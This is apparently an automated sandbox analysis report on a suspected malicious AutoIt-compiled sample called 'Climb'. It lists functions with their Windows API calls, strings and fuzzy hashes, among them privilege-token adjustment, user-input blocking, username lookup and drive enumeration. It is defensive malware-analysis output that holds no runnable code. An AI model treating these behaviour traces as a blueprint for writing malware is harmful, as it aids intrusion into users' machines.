Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d242beaa5ac61f4e3b1ec071a0974ae431e1fbf2001bc3594d6cd110d21f2da6
Instruction ID: d5ba2eaa647de4c4b9c836f2c9c5250ea9192795ccab34462aae34f80fd291e9
Opcode Fuzzy Hash: d242beaa5ac61f4e3b1ec071a0974ae431e1fbf2001bc3594d6cd110d21f2da6
Instruction Fuzzy Hash: 7531D77490122DABCB21DF64D9887DCBBB4BF18310F5041DAE80CA6290EB709FC58F55

Function 00552010 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 0051014B: __CxxThrowException@8.LIBVCRUNTIME ref: 005109D8
Part of subcall function 0051014B: __CxxThrowException@8.LIBVCRUNTIME ref: 005109F5

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0055205A
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00552087
GetLastError.KERNEL32 ref: 00552097

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: b1b59a3977f2f9112ad9ce6d8232f74c6a7a215a0b2fa3617e92e0daee45f96a
Instruction ID: cfe118f77ef340b79430076237e313d112ddef02454da19b59d50e6d9a0038b8
Opcode Fuzzy Hash: b1b59a3977f2f9112ad9ce6d8232f74c6a7a215a0b2fa3617e92e0daee45f96a
Instruction Fuzzy Hash: 521190B2400205AFE718AF54DC8AD6BBBB8FB45711F20841EE84656291EB70AC85CB60

Function 00515058 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515079
TerminateProcess.KERNEL32(00000000,?,0051502E,?,005B98D8,0000000C,00515185,?,00000002,00000000), ref: 00515080
ExitProcess.KERNEL32 ref: 00515092

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 8c30b9854fb35e172536b1c53d6d8ae4a2f2252a20ab7fe961f539fa9c56b7a3
Instruction ID: 1ef02eec2e692074be96856945a2ee9f63b9abb035387cc39aff6d79da22f947
Opcode Fuzzy Hash: 8c30b9854fb35e172536b1c53d6d8ae4a2f2252a20ab7fe961f539fa9c56b7a3
Instruction Fuzzy Hash: A4E09231400648AFDB216F94DD0DA983FB9BFA5381B114414F849AA1A1EB359986DB90

Function 0054E652 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0054E664

Strings

X64, xrefs: 0054E680

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: c23e6943d6c32d14806a2ae849ab0fa35c39eb1591ba6ebc1f4bef934b1b9f65
Instruction ID: 23d21b892ed12e64c21008b71e0db5977fe583f4bcdf89708870e99feced47ab
Opcode Fuzzy Hash: c23e6943d6c32d14806a2ae849ab0fa35c39eb1591ba6ebc1f4bef934b1b9f65
Instruction Fuzzy Hash: 9DD0C9B480511DEACF80CB90EC8CDDD77BCBB14304F100A51F506A2040D73095489B20

Function 005641FA Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564229
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,005752EE,?,?,00000035,?), ref: 00564239

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 4467cf38ad4f14286b6c6c92c6712d6aa1969fab3f09b4797500e9bf817b578f
Instruction ID: 59e16f45905760de416e23afd5b833dd5f56a5f8ee6cb5140d44b41a371241c2
Opcode Fuzzy Hash: 4467cf38ad4f14286b6c6c92c6712d6aa1969fab3f09b4797500e9bf817b578f
Instruction Fuzzy Hash: 80F0A0746002296AE72016A6AC4DFEB3BADFFC5761F100165B905E3185D960990487B0

Function 00551A0B Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00551B48), ref: 00551A20
CloseHandle.KERNEL32(?,?,00551B48), ref: 00551A35

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 6341eb94f95bd8d726d6968801eed7e71b9c14ebe129ebada3565bc9d9713a57
Instruction ID: 4d86e48bb36b3caeb3aff96315207c3b1c1cce4269120ab5d9384dfa485f3d5e
Opcode Fuzzy Hash: 6341eb94f95bd8d726d6968801eed7e71b9c14ebe129ebada3565bc9d9713a57
Instruction Fuzzy Hash: 2EE01A72044611BEF7252B10FC09FB27BE9FB04321F24881EF895804B0EAA26CD0EB50

Function 0056F4FF Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 0056F51A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 10ae80a49dc1e6b1e8ec12de883f1809359ea7f671f61bef70c0ca09dd77a1ea
Instruction ID: 1ed4893f118b3987de9ff54e2ed5879714325c62273c4d06c5571590528d43bc
Opcode Fuzzy Hash: 10ae80a49dc1e6b1e8ec12de883f1809359ea7f671f61bef70c0ca09dd77a1ea
Instruction Fuzzy Hash: 70E092312002085FC710DF6AE400956BBE8AFA4761B00842AF94AC7251D670AC448BA1

Function 0055EC6C Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 0055EC95

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 877c92e7dba3463ab4fe3d1c12d1cf0793745125caf3f4f4c85b0678dffd73a1
Instruction ID: 67a4df4ac489e6d21f5c1de0034d2c30a5cdfdd7d4349aa7a2010fbb1cb64d59
Opcode Fuzzy Hash: 877c92e7dba3463ab4fe3d1c12d1cf0793745125caf3f4f4c85b0678dffd73a1
Instruction Fuzzy Hash: 06D017B619820169E81C0A3C8B3FE360E4AB302743F80574BF902E5595E481DF0CA221

Function 00510D45 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00020D51,0051075E), ref: 00510D4A

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 7a39001958e63ae0d5a636af19384635842d051190ee7b0b176bdffeca89271d
Instruction ID: ffd64a20e684c7d26363840b31ce048bc04ebce7e7ffc41f22c9294334bf4b55
Opcode Fuzzy Hash: 7a39001958e63ae0d5a636af19384635842d051190ee7b0b176bdffeca89271d
Instruction Fuzzy Hash:

Function 0057353B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 0057358D
DeleteObject.GDI32(00000000), ref: 005735A0
DestroyWindow.USER32 ref: 005735AF
GetDesktopWindow.USER32 ref: 005735CA
GetWindowRect.USER32(00000000), ref: 005735D1
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00573700
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 0057370E
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573755
GetClientRect.USER32(00000000,?), ref: 00573761
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0057379D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737BF
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737D2
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737DD
GlobalLock.KERNEL32(00000000), ref: 005737E6
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005737F5
GlobalUnlock.KERNEL32(00000000), ref: 005737FE
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573805
GlobalFree.KERNEL32(00000000), ref: 00573810
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573822
OleLoadPicture.OLEAUT32(?,00000000,00000000,00590C04,00000000), ref: 00573838
GlobalFree.KERNEL32(00000000), ref: 00573848
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 0057386E
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 0057388D
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 005738AF
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00573A9C

Strings

, xrefs: 00573A22
static, xrefs: 00573797, 005738EE
AutoIt v3, xrefs: 0057374F
DISPLAY, xrefs: 005738FF

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 64fc09b04ce7828dfc9d5cc40936baee4695382d124904c626fa3340dcca55cb
Instruction ID: 35b5b9b71f0d32d4882274fa387d160de2b607dc1875861226f59165792f0422
Opcode Fuzzy Hash: 64fc09b04ce7828dfc9d5cc40936baee4695382d124904c626fa3340dcca55cb
Instruction Fuzzy Hash: 50028071500209AFDB14DF65DD89EAE7BB9FF48720F008519F905AB2A0DB74AD05EF60

Function 004F1625 Relevance: 53.0, APIs: 26, Strings: 4, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 004F16B4
SendMessageW.USER32(?,00001308,?,00000000), ref: 00532B07
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00532B40
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00532F85

Part of subcall function 004F1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,004F1488,?,00000000,?,?,?,?,004F145A,00000000,?), ref: 004F1865

SendMessageW.USER32(?,00001053), ref: 00532FC1
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00532FD8
ImageList_Destroy.COMCTL32(00000000,?), ref: 00532FEE
ImageList_Destroy.COMCTL32(00000000,?), ref: 00532FF9

Strings

(\, xrefs: 00533035
(\, xrefs: 00532CA1
(\, xrefs: 00532B86
0, xrefs: 00532E11

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0$(\$(\$(\
API String ID: 2760611726-2692967735
Opcode ID: ce4a72a2577c37f9a64a75b38c08b7928e081b51cc2aeb9264e0ae402035e5d2
Instruction ID: 16d60ebcca91c19d0469e74a90f226ed18a652193c9cee5864a691b90a340512
Opcode Fuzzy Hash: ce4a72a2577c37f9a64a75b38c08b7928e081b51cc2aeb9264e0ae402035e5d2
Instruction Fuzzy Hash: 8412B930204A05EFDB25DF14C888BBABBF5FB54304F18856EE585DB261C735AC86EB91

Function 0057316E Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0057319B
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 005732C7
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00573306
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00573316
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 0057335D
GetClientRect.USER32(00000000,?), ref: 00573369
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 005733B2
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 005733C1
GetStockObject.GDI32(00000011), ref: 005733D1
SelectObject.GDI32(00000000,00000000), ref: 005733D5
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 005733E5
GetDeviceCaps.GDI32(00000000,0000005A), ref: 005733EE
DeleteDC.GDI32(00000000), ref: 005733F7
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00573423
SendMessageW.USER32(00000030,00000000,00000001), ref: 0057343A
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 0057347A
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0057348E
SendMessageW.USER32(00000404,00000001,00000000), ref: 0057349F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 005734D4
GetStockObject.GDI32(00000011), ref: 005734DF
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005734EA
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 005734F4

Strings

static, xrefs: 005733AC, 005734CE
msctls_progress32, xrefs: 00573470
AutoIt v3, xrefs: 00573355
DISPLAY, xrefs: 005733B7

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: c89fa4662d23a72977c03b64285312fc1a4a0a33fc79f7c57d70271a0ae501c4
Instruction ID: 9fa11b1325f6a83d5b83c6339a5f2386b90abd88b55c9527db4297dfcea52bbb
Opcode Fuzzy Hash: c89fa4662d23a72977c03b64285312fc1a4a0a33fc79f7c57d70271a0ae501c4
Instruction Fuzzy Hash: 0EB16C71A00209AFEB14DFA8DD49FAA7BB9FB18710F008519FA15E72D0D774AD04DBA4

Function 00565524 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00565532
GetDriveTypeW.KERNEL32(?,0058DC30,?,\\.\,0058DCD0), ref: 0056560F
SetErrorMode.KERNEL32(00000000,0058DC30,?,\\.\,0058DCD0), ref: 0056577B

Strings

CDROM, xrefs: 00565640
USB, xrefs: 005656F9
SCSI, xrefs: 005656CF
SSD, xrefs: 0056568F
RAMDisk, xrefs: 00565639
1394, xrefs: 005656E4
SATA, xrefs: 00565715
FileBackedVirtual, xrefs: 00565731
\\.\, xrefs: 00565584
Fixed, xrefs: 0056564E
Fibre, xrefs: 005656F2
Virtual, xrefs: 0056572A
ATAPI, xrefs: 005656D6
ATA, xrefs: 005656DD
SSA, xrefs: 005656EB
Unknown, xrefs: 00565632, 005656C8
RAID, xrefs: 00565700
Network, xrefs: 00565647
PhysicalDrive, xrefs: 005655BB
Removable, xrefs: 00565655, 0056565A
iSCSI, xrefs: 00565707
SAS, xrefs: 0056570E
MMC, xrefs: 00565723

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 8f505b5959461d27ae8b52f4f17404fbc8d5dc4e55e54625c4f98a7afa5161a4
Instruction ID: 4ee0510024da1e0098a61817ce5c5de3477589a5e98e18248761420ff1a6dd44
Opcode Fuzzy Hash: 8f505b5959461d27ae8b52f4f17404fbc8d5dc4e55e54625c4f98a7afa5161a4
Instruction Fuzzy Hash: 4461F630684A0DDFC724DF24C9969B87FB1FF98394F24845AE506AB291E731EE41CB51

Function 004F2521 Relevance: 42.3, APIs: 18, Strings: 6, Instructions: 282windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F25F8
GetSystemMetrics.USER32(00000007), ref: 004F2600
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004F262B
GetSystemMetrics.USER32(00000008), ref: 004F2633
GetSystemMetrics.USER32(00000004), ref: 004F2658
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004F2675
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 004F2685
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004F26B8
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004F26CC
GetClientRect.USER32(00000000,000000FF), ref: 004F26EA
GetStockObject.GDI32(00000011), ref: 004F2706
SendMessageW.USER32(00000000,00000030,00000000), ref: 004F2711

Part of subcall function 004F19CD: GetCursorPos.USER32(?), ref: 004F19E1
Part of subcall function 004F19CD: ScreenToClient.USER32(00000000,?), ref: 004F19FE
Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000001), ref: 004F1A23
Part of subcall function 004F19CD: GetAsyncKeyState.USER32(00000002), ref: 004F1A3D

SetTimer.USER32(00000000,00000000,00000028,004F199C), ref: 004F2738

Strings

(\, xrefs: 004F271A
(\, xrefs: 004F2749
<)\, xrefs: 005339A6
<)\, xrefs: 004F255C
(\, xrefs: 00533909
AutoIt v3 GUI, xrefs: 004F26B0

Memory Dump Source

Source File: 0000000E.00000002.3469247957.00000000004F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 004F0000, based on PE: true

Associated: 0000000E.00000002.3469214508.00000000004F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.000000000058D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469313118.00000000005B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469369981.00000000005BD000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.3469392963.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_4f0000_Climb.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: <)\$<)\$AutoIt v3 GUI$(\$(\$(\
API String ID: 1458621304-3033108029
Opcode ID: 777e0b83e2916f0d933b8fcee3fc0b599118137f623deb2bb09ef658014dcd2a
Instruction ID: 075dd60477094fc638f6c3c5be5f7dde12adbe4c0f627ddce9852199cd33c7b4
Opcode Fuzzy Hash: 777e0b83e2916f0d933b8fcee3fc0b599118137f623deb2bb09ef658014dcd2a
Instruction Fuzzy Hash: 3FB17A31A00209EFDB14DFA8CD55BAE7BB5FB48314F10421AFA05AB2E0DBB4E944DB55

Function 00581A8F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00581BC4
GetDesktopWindow.USER32 ref: 00581BD9
GetWindowRect.USER32(00000000), ref: 00581BE0
GetWindowLongW.USER32(?,000000F0), ref: 00581C35
DestroyWindow.USER32(?), ref: 00581C55
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00581C89
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00581CA7
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00581CB9
SendMessageW.USER32(00000000,00000421,?,?), ref: 00581CCE
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00581CE1
